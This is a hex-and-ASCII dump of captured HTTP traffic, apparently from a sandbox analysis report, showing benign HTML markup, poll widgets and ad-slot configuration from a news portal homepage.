                                                                                                                                                                        2023-06-02 11:13:21 UTC804INData Raw: 28 36 70 78 29 20 43 75 72 28 64 29 20 77 61 66 65 72 2d 73 74 69 63 6b 79 22 20 64 61 74 61 2d 77 66 2d 73 74 69 63 6b 79 2d 62 6f 75 6e 64 61 72 79 3d 76 69 65 77 65 72 2d 77 72 61 70 70 65 72 20 64 61 74 61 2d 77 66 2d 73 74 69 63 6b 79 2d 6f 66 66 73 65 74 3d 31 30 30 70 78 20 64 61 74 61 2d 77 66 2d 73 74 69 63 6b 79 2d 74 61 72 67 65 74 3d 2e 63 6c 6f 73 65 2d 62 74 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 20 57 28 31 30 30 25 29 22 20 69 64 3d 76 69 65 77 65 72 2d 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 3e 3c 62 75 74 74 6f 6e 20 64 61 74 61 2d 79 6c 6b 3d 73 65 63 3a 68 6c 2d 76 69 65 77 65 72 3b 73 6c 6b 3d 63 6c 6f 73 65 3b 65 6c 6d 3a 62 74 6e 3b 65 6c 6d 74 3a 63 6c 3b 69 74 63 3a 30 3b 72 73
                                                                                                                                                                        Data Ascii: (6px) Cur(d) wafer-sticky" data-wf-sticky-boundary=viewer-wrapper data-wf-sticky-offset=100px data-wf-sticky-target=.close-btn><div class="wafer-rapid-module W(100%)" id=viewer-close-button><button data-ylk=sec:hl-viewer;slk=close;elm:btn;elmt:cl;itc:0;rs
                                                                                                                                                                        2023-06-02 11:13:21 UTC805INData Raw: 73 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 74 72 69 67 67 65 72 3d 73 74 61 74 65 43 68 61 6e 67 65 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 77 72 61 70 70 65 72 3d 63 6f 6e 74 65 6e 74 2d 61 72 74 69 63 6c 65 73 2d 77 72 61 70 70 65 72 20 64 61 74 61 2d 77 66 2d 73 74 61 74 65 2d 63 61 61 73 2d 63 61 74 65 67 6f 72 79 2d 6c 61 62 65 6c 3d 5b 73 74 61 74 65 2e 76 69 65 77 65 72 4d 61 69 6e 41 72 74 69 63 6c 65 43 61 74 65 67 6f 72 79 4c 61 62 65 6c 5d 20 64 61 74 61 2d 77 66 2d 73 74 61 74 65 2d 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 3d 5b 73 74 61 74 65 2e 76 69 65 77 65 72 4d 61 69 6e 41 72 74 69 63 6c 65 43 6f 6c 6c 61 70 73 65 64 5d 20 64 61 74 61 2d 77 66 2d 73 74 61 74 65 2d 63 61 61 73 2d 75 75 69 64 3d 5b 73 74 61 74 65 2e 76 69 65 77 65 72
                                                                                                                                                                        Data Ascii: s data-wf-caas-trigger=stateChange data-wf-caas-wrapper=content-articles-wrapper data-wf-state-caas-category-label=[state.viewerMainArticleCategoryLabel] data-wf-state-caas-collapsed=[state.viewerMainArticleCollapsed] data-wf-state-caas-uuid=[state.viewer
                                                                                                                                                                        2023-06-02 11:13:21 UTC805INData Raw: 5d 20 64 61 74 61 2d 79 61 66 74 2d 6d 6f 64 75 6c 65 3d 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 2d 6d 61 69 6e 2d 61 72 74 69 63 6c 65 20 69 64 3d 6d 61 69 6e 41 72 74 69 63 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 28 37 34 30 70 78 29 20 57 28 31 30 30 25 29 20 42 67 28 2d 2d 77 68 69 74 65 29 20 42 78 7a 28 62 62 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 67 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 20 50 6f 73 28 72 29 20 57 28 31 30 30 25 29 20 48 28 31 30 30 25 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 73 28 61 29 20 42 67 28 2d 2d 77 68 69 74 65 29 20 53 74 61 72 74 28 30 29 20 54 28 30 29 20 57 28 31 30 30 25 29 20 48 28 31 35 70 78 29 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 73 28 61 29
                                                                                                                                                                        Data Ascii: ] data-yaft-module=homepage-viewer-main-article id=mainArticle><div class="H(740px) W(100%) Bg(--white) Bxz(bb)"><div class="Bg(--dirty-seagull) Pos(r) W(100%) H(100%)"><div class="Pos(a) Bg(--white) Start(0) T(0) W(100%) H(15px)"></div><div class="Pos(a)
                                                                                                                                                                        2023-06-02 11:13:21 UTC807INData Raw: 74 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 4d 62 28 34 30 70 78 29 22 20 64 61 74 61 2d 77 66 2d 5b 64 61 74 61 2d 75 75 69 64 5d 3d 5b 73 74 61 74 65 2e 76 69 65 77 65 72 4d 61 69 6e 41 72 74 69 63 6c 65 49 64 5d 20 64 61 74 61 2d 77 66 2d 5b 69 64 5d 3d 73 70 6f 74 69 6d 2d 77 72 61 70 70 65 72 2d 5b 73 74 61 74 65 2e 76 69 65 77 65 72 4d 61 69 6e 41 72 74 69 63 6c 65 49 64 5d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 20 69 64 3d 6d 61 69 6e 41 72 74 69 63 6c 65 49 64 43 6f 6d 6d 65 6e 74 73 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 76 69 65 77 2d 73 70 6f 74 69 6d 2d 63 6d 6e 74 73 2d 62 74 6e 20 4d 73 74 61 72 74 28 31 30 36 70 78 29 20 50 6f 73 28 72 29 20 44 28 69 62 29 20 54 64 28 6e 29 20 42 64 73
                                                                                                                                                                        Data Ascii: tn-container Mb(40px)" data-wf-[data-uuid]=[state.viewerMainArticleId] data-wf-[id]=spotim-wrapper-[state.viewerMainArticleId]><div class=wafer-rapid-module id=mainArticleIdComments><button class="view-spotim-cmnts-btn Mstart(106px) Pos(r) D(ib) Td(n) Bds
                                                                                                                                                                        2023-06-02 11:13:21 UTC808INData Raw: 63 29 20 50 73 74 61 72 74 28 38 70 78 29 20 57 28 31 30 30 25 29 22 3e 3c 69 20 63 6c 61 73 73 3d 22 42 64 73 28 73 29 20 42 64 74 63 28 2d 2d 62 61 74 63 61 76 65 29 20 42 64 62 77 28 31 70 78 29 20 42 64 74 77 28 31 70 78 29 20 42 78 7a 28 62 62 29 20 57 28 31 30 30 25 29 22 3e 3c 2f 69 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 66 65 72 2d 63 61 61 73 20 4d 62 28 34 30 70 78 29 20 4d 69 68 28 32 30 30 70 78 29 22 20 69 64 3d 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 31 20 64 61 74 61 2d 63 6f 6d 6d 65 6e 74 73 2d 69 64 3d 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 31 43 6f 6d 6d 65 6e 74 73 20 64 61 74 61 2d 70 6f 6c 6c 73 2d 69 64 3d 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 31 50 6f 6c 6c 73 20 64 61
                                                                                                                                                                        Data Ascii: c) Pstart(8px) W(100%)"><i class="Bds(s) Bdtc(--batcave) Bdbw(1px) Bdtw(1px) Bxz(bb) W(100%)"></i></div></div><div class="wafer-caas Mb(40px) Mih(200px)" id=clusterArticle1 data-comments-id=clusterArticleId1Comments data-polls-id=clusterArticleId1Polls da
                                                                                                                                                                        2023-06-02 11:13:21 UTC809INData Raw: 72 65 6d 6f 74 65 3f 63 74 72 6c 3d 46 61 63 74 75 61 6c 50 6f 6c 6c 26 6c 61 6e 67 3d 65 6e 2d 55 53 26 6d 5f 69 64 3d 70 6f 6c 6c 73 26 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 72 65 67 69 6f 6e 3d 55 53 26 72 69 64 3d 33 63 72 73 70 69 35 69 37 6a 6a 6d 67 26 73 69 74 65 3d 66 70 26 61 70 70 74 79 70 65 3d 64 65 66 61 75 6c 74 20 64 61 74 61 2d 77 66 2d 73 74 61 74 65 2d 62 6f 64 79 3d 27 7b 22 63 6f 6e 66 69 67 22 3a 7b 22 70 72 6f 6a 65 63 74 49 64 22 3a 22 5b 73 74 61 74 65 2e 76 69 65 77 65 72 43 6c 75 73 74 65 72 41 72 74 69 63 6c 65 31 50 6f 6c 6c 49 64 5d 22 7d 2c 22 63 74 72 6c 22 3a 22 46 61 63 74 75 61 6c 50 6f 6c 6c 22 2c 22 6d 5f 69 64 22 3a 22 70 6f 6c 6c 73 22 2c 22 6d 5f 6d 6f 64 65 22 3a 22 6a 73 6f 6e 22 7d 27 3e 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                        Data Ascii: remote?ctrl=FactualPoll&lang=en-US&m_id=polls&m_mode=json&region=US&rid=3crspi5i7jjmg&site=fp&apptype=default data-wf-state-body='{"config":{"projectId":"[state.viewerClusterArticle1PollId]"},"ctrl":"FactualPoll","m_id":"polls","m_mode":"json"}'><div clas
                                                                                                                                                                        2023-06-02 11:13:21 UTC810INData Raw: 42 2d 32 22 7d 27 3e 3c 64 69 76 20 69 64 3d 77 61 66 65 72 2d 64 61 72 6c 61 2d 43 4f 4d 4d 45 4e 54 53 4c 44 52 42 2d 32 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 44 28 6e 29 20 63 6c 75 73 74 65 72 32 5f 44 28 62 29 20 63 6c 75 73 74 65 72 33 5f 44 28 62 29 20 63 6c 75 73 74 65 72 34 5f 44 28 62 29 20 63 6c 75 73 74 65 72 35 5f 44 28 62 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 44 28 66 29 20 41 69 28 63 29 20 57 28 61 75 74 6f 29 20 4d 62 28 35 30 70 78 29 20 76 69 65 77 65 72 2d 61 72 74 69 63 6c 65 2d 64 69 76 69 64 65 72 22 3e 3c 69 20 63 6c 61 73 73 3d 22 48 28 31 34 70 78 29 20 4d 69 77 28 38 70 78 29 20 42 67 63 28 2d 2d 67 72 61 70 65 2d 6a 65 6c 6c 79 29 22 3e 3c 2f 69 3e 3c 68 34 20 63 6c
                                                                                                                                                                        Data Ascii: B-2"}'><div id=wafer-darla-COMMENTSLDRB-2></div></div></div><div class="D(n) cluster2_D(b) cluster3_D(b) cluster4_D(b) cluster5_D(b)"><div class="D(f) Ai(c) W(auto) Mb(50px) viewer-article-divider"><i class="H(14px) Miw(8px) Bgc(--grape-jelly)"></i><h4 cl
                                                                                                                                                                        2023-06-02 11:13:21 UTC812INData Raw: 20 63 6c 61 73 73 3d 22 50 6f 73 28 61 29 20 42 67 28 2d 2d 77 68 69 74 65 29 20 54 28 33 30 35 70 78 29 20 45 6e 64 28 30 29 20 57 28 31 30 30 25 29 20 48 28 32 30 70 78 29 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 73 28 61 29 20 42 67 28 2d 2d 77 68 69 74 65 29 20 53 74 61 72 74 28 30 29 20 54 28 33 33 35 70 78 29 20 57 28 31 30 30 25 29 20 48 28 31 35 70 78 29 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 32 50 6f 6c 6c 73 20 63 6c 61 73 73 3d 22 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 32 50 6f 6c 6c 73 20 77 61 66 65 72 2d 66 65 74 63 68 22 20 64 61 74 61 2d 77 66 2d 62 6f 75 6e 64 61 72 79 3d 63 6c 75 73 74 65 72 41
                                                                                                                                                                        Data Ascii: class="Pos(a) Bg(--white) T(305px) End(0) W(100%) H(20px)"></div><div class="Pos(a) Bg(--white) Start(0) T(335px) W(100%) H(15px)"></div></div></div></div><div id=clusterArticleId2Polls class="clusterArticleId2Polls wafer-fetch" data-wf-boundary=clusterA
                                                                                                                                                                        2023-06-02 11:13:21 UTC813INData Raw: 20 30 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 76 69 65 77 70 6f 72 74 20 64 61 74 61 2d 77 66 2d 5b 64 61 72 6c 61 2d 63 6f 6e 66 69 67 5d 3d 27 7b 22 61 64 64 41 75 74 6f 45 76 65 6e 74 22 3a 74 72 75 65 2c 22 62 75 63 6b 65 74 22 3a 22 5b 73 74 61 74 65 2e 76 69 65 77 65 72 4d 61 69 6e 41 72 74 69 63 6c 65 42 75 63 6b 65 74 5d 22 2c 22 65 6e 61 62 6c 65 64 22 3a 22 5b 73 74 61 74 65 2e 70 6f 73 74 41 72 74 69 63 6c 65 41 64 45 6e 61 62 6c 65 64 5d 22 2c 22 6d 65 74 61 22 3a 7b 22 43 4f 4d 4d 45 4e 54 53 4c 44 52 42 2d 33 22 3a 7b 22 68 65 69 67 68 74 22 3a 39 30 2c 22 77 69 64 74 68 22 3a 37 32 38 7d 7d 2c 22 6f 66 66 73 65 74 58 22 3a 22 30 22 2c 22 6f 66 66 73 65 74 59 22 3a 22 31 30 30 22 2c 22 73 69 74 65 41 74 74 72 69 62 75 74 65 22
                                                                                                                                                                        Data Ascii: 0" data-wf-trigger=viewport data-wf-[darla-config]='{"addAutoEvent":true,"bucket":"[state.viewerMainArticleBucket]","enabled":"[state.postArticleAdEnabled]","meta":{"COMMENTSLDRB-3":{"height":90,"width":728}},"offsetX":"0","offsetY":"100","siteAttribute"
                                                                                                                                                                        2023-06-02 11:13:21 UTC814INData Raw: 73 74 61 74 65 43 68 61 6e 67 65 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 2f 66 69 72 65 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 63 74 72 6c 3d 46 61 63 74 75 61 6c 50 6f 6c 6c 26 6c 61 6e 67 3d 65 6e 2d 55 53 26 6d 5f 69 64 3d 70 6f 6c 6c 73 26 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 72 65 67 69 6f 6e 3d 55 53 26 72 69 64 3d 33 63 72 73 70 69 35 69 37 6a 6a 6d 67 26 73 69 74 65 3d 66 70 26 61 70 70 74 79 70 65 3d 64 65 66 61 75 6c 74 20 64 61 74 61 2d 77 66 2d 73 74 61 74 65 2d 62 6f 64 79 3d 27 7b 22 63 6f 6e 66 69 67 22 3a 7b 22 70 72 6f 6a 65 63 74 49 64 22 3a 22 5b 73 74 61 74 65 2e 76 69 65 77 65 72 43 6c 75 73 74 65 72 41 72 74 69 63 6c 65 33 50 6f 6c 6c 49 64 5d 22 7d 2c 22 63 74 72 6c 22 3a 22 46 61 63 74 75 61 6c 50 6f 6c 6c 22 2c 22 6d 5f 69
                                                                                                                                                                        Data Ascii: stateChange data-wf-url=/fire_ms/_rcv/remote?ctrl=FactualPoll&lang=en-US&m_id=polls&m_mode=json&region=US&rid=3crspi5i7jjmg&site=fp&apptype=default data-wf-state-body='{"config":{"projectId":"[state.viewerClusterArticle3PollId]"},"ctrl":"FactualPoll","m_i
                                                                                                                                                                        2023-06-02 11:13:21 UTC816INData Raw: 61 69 6e 41 72 74 69 63 6c 65 53 70 61 63 65 49 64 5d 22 2c 22 70 6f 73 22 3a 22 43 4f 4d 4d 45 4e 54 53 4c 44 52 42 2d 34 22 7d 27 3e 3c 64 69 76 20 69 64 3d 77 61 66 65 72 2d 64 61 72 6c 61 2d 43 4f 4d 4d 45 4e 54 53 4c 44 52 42 2d 34 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 44 28 6e 29 20 63 6c 75 73 74 65 72 34 5f 44 28 62 29 20 63 6c 75 73 74 65 72 35 5f 44 28 62 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 44 28 66 29 20 41 69 28 63 29 20 57 28 61 75 74 6f 29 20 4d 62 28 35 30 70 78 29 20 76 69 65 77 65 72 2d 61 72 74 69 63 6c 65 2d 64 69 76 69 64 65 72 22 3e 3c 69 20 63 6c 61 73 73 3d 22 48 28 31 34 70 78 29 20 4d 69 77 28 38 70 78 29 20 42 67 63 28 2d 2d 67 72 61 70 65 2d 6a 65 6c 6c 79 29 22 3e
                                                                                                                                                                        Data Ascii: ainArticleSpaceId]","pos":"COMMENTSLDRB-4"}'><div id=wafer-darla-COMMENTSLDRB-4></div></div></div><div class="D(n) cluster4_D(b) cluster5_D(b)"><div class="D(f) Ai(c) W(auto) Mb(50px) viewer-article-divider"><i class="H(14px) Miw(8px) Bgc(--grape-jelly)">
                                                                                                                                                                        2023-06-02 11:13:21 UTC817INData Raw: 5f 4d 62 28 34 30 70 78 29 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 44 28 6e 29 20 77 61 66 65 72 2d 62 69 6e 64 20 50 6f 73 28 72 29 20 76 69 65 77 2d 73 70 6f 74 69 6d 2d 63 6d 6e 74 73 2d 62 74 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 4d 62 28 34 30 70 78 29 22 20 64 61 74 61 2d 77 66 2d 5b 64 61 74 61 2d 75 75 69 64 5d 3d 5b 73 74 61 74 65 2e 76 69 65 77 65 72 43 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 34 5d 20 64 61 74 61 2d 77 66 2d 5b 69 64 5d 3d 73 70 6f 74 69 6d 2d 77 72 61 70 70 65 72 2d 5b 73 74 61 74 65 2e 76 69 65 77 65 72 43 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 34 5d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 20 69 64 3d 63 6c 75 73 74 65 72 41 72 74
                                                                                                                                                                        Data Ascii: _Mb(40px)"></div></div><div class="D(n) wafer-bind Pos(r) view-spotim-cmnts-btn-container Mb(40px)" data-wf-[data-uuid]=[state.viewerClusterArticleId4] data-wf-[id]=spotim-wrapper-[state.viewerClusterArticleId4]><div class=wafer-rapid-module id=clusterArt
                                                                                                                                                                        2023-06-02 11:13:21 UTC818INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 44 28 66 29 20 41 69 28 63 29 20 50 73 74 61 72 74 28 38 70 78 29 20 57 28 31 30 30 25 29 22 3e 3c 69 20 63 6c 61 73 73 3d 22 42 64 73 28 73 29 20 42 64 74 63 28 2d 2d 62 61 74 63 61 76 65 29 20 42 64 62 77 28 31 70 78 29 20 42 64 74 77 28 31 70 78 29 20 42 78 7a 28 62 62 29 20 57 28 31 30 30 25 29 22 3e 3c 2f 69 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 66 65 72 2d 63 61 61 73 20 4d 62 28 34 30 70 78 29 20 4d 69 68 28 32 30 30 70 78 29 22 20 69 64 3d 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 35 20 64 61 74 61 2d 63 6f 6d 6d 65 6e 74 73 2d 69 64 3d 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 49 64 35 43 6f 6d 6d 65 6e 74 73 20 64 61 74 61 2d 70 6f 6c 6c 73 2d 69 64 3d 63 6c 75 73 74
                                                                                                                                                                        Data Ascii: <div class="D(f) Ai(c) Pstart(8px) W(100%)"><i class="Bds(s) Bdtc(--batcave) Bdbw(1px) Bdtw(1px) Bxz(bb) W(100%)"></i></div></div><div class="wafer-caas Mb(40px) Mih(200px)" id=clusterArticle5 data-comments-id=clusterArticleId5Comments data-polls-id=clust
                                                                                                                                                                        2023-06-02 11:13:21 UTC819INData Raw: 77 28 32 70 78 29 20 42 64 63 28 2d 2d 62 61 74 63 61 76 65 29 20 42 64 72 73 28 32 34 70 78 29 20 50 78 28 33 30 70 78 29 20 50 79 28 31 33 70 78 29 20 46 7a 28 31 36 70 78 29 20 46 77 28 36 30 30 29 20 4c 68 28 32 30 70 78 29 20 43 28 2d 2d 62 61 74 63 61 76 65 29 20 42 67 63 28 2d 2d 62 61 74 63 61 76 65 29 3a 68 20 43 28 2d 2d 77 68 69 74 65 29 3a 68 22 20 64 61 74 61 2d 79 6c 6b 3d 22 73 65 63 3a 76 69 65 77 2d 63 6d 6e 74 73 2d 63 74 61 3b 69 74 63 3a 31 3b 73 6c 6b 3a 56 69 65 77 20 43 6f 6d 6d 65 6e 74 73 3b 65 6c 6d 3a 62 74 6e 3b 63 70 6f 73 3a 35 3b 22 3e 56 69 65 77 20 63 6f 6d 6d 65 6e 74 73 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 66 65 72 2d 66 65 74 63 68 20
                                                                                                                                                                        Data Ascii: w(2px) Bdc(--batcave) Bdrs(24px) Px(30px) Py(13px) Fz(16px) Fw(600) Lh(20px) C(--batcave) Bgc(--batcave):h C(--white):h" data-ylk="sec:view-cmnts-cta;itc:1;slk:View Comments;elm:btn;cpos:5;">View comments</button></div></div></div><div class="wafer-fetch
                                                                                                                                                                        2023-06-02 11:13:21 UTC821INData Raw: 64 3d 76 69 65 77 65 72 2d 46 53 52 56 59 2d 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 74 65 6d 70 6c 61 74 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 77 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 61 64 73 43 6f 6e 66 69 67 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 69 65 6e 74 50 6f 73 69 74 69 6f 6e 4d 65 74 61 3a 20 7b 22 70 6f 73 69 74 69 6f 6e 73 22 3a 5b 7b 22 63 6c 65 61
                                                                                                                                                                        Data Ascii: d=viewer-FSRVY-iframe></div></div></div></div></template><script type=text/javascript nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> (function(w) { var adsConfig = { clientPositionMeta: {"positions":[{"clea
                                                                                                                                                                        2023-06-02 11:13:21 UTC822INData Raw: 65 78 70 2d 6f 76 72 22 3a 30 2c 22 6c 79 72 22 3a 30 7d 2c 22 77 22 3a 33 30 30 7d 7d 2c 22 49 4e 42 4f 44 59 4c 52 45 43 2d 4e 41 54 49 56 45 2d 50 48 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 63 6c 65 61 6e 22 3a 22 73 64 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 22 64 65 73 74 22 3a 22 73 64 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 69 66 72 61 6d 65 22 2c 22 66 64 62 22 3a 31 2c 22 68 22 3a 33 30 30 2c 22 69 64 22 3a 22 4c 52 45 43 22 2c 22 6d 65 74 61 53 69 7a 65 22 3a 66 61 6c 73 65 2c 22 70 6f 73 22 3a 22 4c 52 45 43 22 2c 22 73 75 70 70 6f 72 74 73 22 3a 7b 22 65 78 70 2d 6f 76 72 22 3a 30 2c 22 6c 79 72 22 3a 30 7d 2c 22 77 22 3a 33 30 30 2c 22 64 6f 75 62 6c 65 42 75 66 66 65 72 69 6e 67 22 3a 66 61 6c 73 65 2c 22 66 6c 65 78 22 3a 7b 22 77 22 3a
                                                                                                                                                                        Data Ascii: exp-ovr":0,"lyr":0},"w":300}},"INBODYLREC-NATIVE-PH":{"meta":{"clean":"sda-placeholder","dest":"sda-placeholder-iframe","fdb":1,"h":300,"id":"LREC","metaSize":false,"pos":"LREC","supports":{"exp-ovr":0,"lyr":0},"w":300,"doubleBuffering":false,"flex":{"w":
                                                                                                                                                                        2023-06-02 11:13:21 UTC823INData Raw: 70 2d 6f 76 72 22 3a 30 2c 22 6c 79 72 22 3a 30 7d 2c 22 77 22 3a 33 30 30 7d 7d 2c 22 49 4e 42 4f 44 59 4c 52 45 43 34 2d 4e 41 54 49 56 45 2d 50 48 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 63 6c 65 61 6e 22 3a 22 73 64 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 22 64 65 73 74 22 3a 22 73 64 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 69 66 72 61 6d 65 22 2c 22 66 64 62 22 3a 31 2c 22 68 22 3a 33 30 30 2c 22 69 64 22 3a 22 4c 52 45 43 22 2c 22 6d 65 74 61 53 69 7a 65 22 3a 66 61 6c 73 65 2c 22 70 6f 73 22 3a 22 4c 52 45 43 22 2c 22 73 75 70 70 6f 72 74 73 22 3a 7b 22 65 78 70 2d 6f 76 72 22 3a 30 2c 22 6c 79 72 22 3a 30 7d 2c 22 77 22 3a 33 30 30 2c 22 64 6f 75 62 6c 65 42 75 66 66 65 72 69 6e 67 22 3a 66 61 6c 73 65 2c 22 66 6c 65 78 22 3a 7b 22 77 22 3a 7b
                                                                                                                                                                        Data Ascii: p-ovr":0,"lyr":0},"w":300}},"INBODYLREC4-NATIVE-PH":{"meta":{"clean":"sda-placeholder","dest":"sda-placeholder-iframe","fdb":1,"h":300,"id":"LREC","metaSize":false,"pos":"LREC","supports":{"exp-ovr":0,"lyr":0},"w":300,"doubleBuffering":false,"flex":{"w":{
                                                                                                                                                                        2023-06-02 11:13:21 UTC824INData Raw: 69 66 72 61 6d 65 22 2c 22 66 64 62 22 3a 31 2c 22 68 22 3a 32 35 30 2c 22 69 64 22 3a 22 4c 52 45 43 33 2d 39 22 2c 22 6d 65 74 61 53 69 7a 65 22 3a 74 72 75 65 2c 22 70 6f 73 22 3a 22 4c 52 45 43 33 2d 39 22 2c 22 73 75 70 70 6f 72 74 73 22 3a 7b 22 65 78 70 2d 6f 76 72 22 3a 30 2c 22 6c 79 72 22 3a 30 7d 2c 22 77 22 3a 33 30 30 7d 2c 22 73 66 6f 70 74 69 6e 22 3a 31 7d 2c 22 4c 52 45 43 34 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 63 6c 65 61 6e 22 3a 22 73 64 61 2d 4c 52 45 43 34 22 2c 22 64 65 73 74 22 3a 22 73 64 61 2d 4c 52 45 43 34 2d 69 66 72 61 6d 65 22 2c 22 66 64 62 22 3a 31 2c 22 68 22 3a 32 35 30 2c 22 69 64 22 3a 22 4c 52 45 43 34 22 2c 22 6d 65 74 61 53 69 7a 65 22 3a 74 72 75 65 2c 22 70 6f 73 22 3a 22 4c 52 45 43 34 22 2c 22 73 75 70 70 6f 72
                                                                                                                                                                        Data Ascii: iframe","fdb":1,"h":250,"id":"LREC3-9","metaSize":true,"pos":"LREC3-9","supports":{"exp-ovr":0,"lyr":0},"w":300},"sfoptin":1},"LREC4":{"meta":{"clean":"sda-LREC4","dest":"sda-LREC4-iframe","fdb":1,"h":250,"id":"LREC4","metaSize":true,"pos":"LREC4","suppor
                                                                                                                                                                        2023-06-02 11:13:21 UTC826INData Raw: 6e 22 3a 31 7d 2c 22 4d 4f 4e 32 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 63 6c 65 61 6e 22 3a 22 73 64 61 2d 4d 4f 4e 32 22 2c 22 64 65 73 74 22 3a 22 73 64 61 2d 4d 4f 4e 32 2d 69 66 72 61 6d 65 22 2c 22 66 64 62 22 3a 31 2c 22 68 22 3a 36 30 30 2c 22 69 64 22 3a 22 4d 4f 4e 32 22 2c 22 70 6f 73 22 3a 22 4d 4f 4e 32 22 2c 22 73 75 70 70 6f 72 74 73 22 3a 7b 22 65 78 70 2d 6f 76 72 22 3a 30 2c 22 6c 79 72 22 3a 30 2c 22 72 65 73 69 7a 65 2d 74 6f 22 3a 31 2c 22 65 78 70 2d 70 75 73 68 22 3a 30 7d 2c 22 77 22 3a 33 30 30 7d 2c 22 73 66 6f 70 74 69 6e 22 3a 30 7d 2c 22 57 46 50 41 44 22 3a 7b 22 63 75 73 74 6f 6d 2d 73 65 74 74 69 6e 67 2d 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 6d 65 74 61 22 3a 7b 22 63 6c 65 61 6e 22 3a 22 73 64 61 2d 57 46 50 41 44
                                                                                                                                                                        Data Ascii: n":1},"MON2":{"meta":{"clean":"sda-MON2","dest":"sda-MON2-iframe","fdb":1,"h":600,"id":"MON2","pos":"MON2","supports":{"exp-ovr":0,"lyr":0,"resize-to":1,"exp-push":0},"w":300},"sfoptin":0},"WFPAD":{"custom-setting-enabled":false,"meta":{"clean":"sda-WFPAD
